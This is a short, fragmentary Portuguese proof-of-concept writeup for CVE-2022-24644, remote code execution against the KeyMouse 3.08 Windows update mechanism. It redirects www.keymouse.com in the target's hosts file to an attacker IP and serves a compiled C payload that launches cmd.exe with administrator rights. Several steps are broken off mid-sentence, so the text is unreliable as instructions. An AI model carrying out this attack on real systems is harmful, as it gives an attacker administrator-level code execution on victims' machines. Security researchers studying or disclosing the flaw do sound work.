
Exploit de prova de conceito para CVE-2022-24644, demonstrando execução remota de código não autenticada via DNS spoofing contra o mecanismo de atualização do KeyMouse Windows 3.08.
ZZ Inc. KeyMouse 3.08 (Windows) Vulnerabilidade de Execução Remota de Código em Atualização Não Autenticada
Uso: python3 cve-2022-24644_poc.py
Detalhes no relatório em gerr.re.
www.keymouse.com para o IP do atacante;
c:\windows\system32\drivers\etc\hosts no alvo.
proof.c no atacante, por exemplo, usando i686-w64-mingw32-gcc proof.c -o proof.exe;#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
Como resultado, o proof.exe é executado no contexto do usuário Administrador com alta integridade.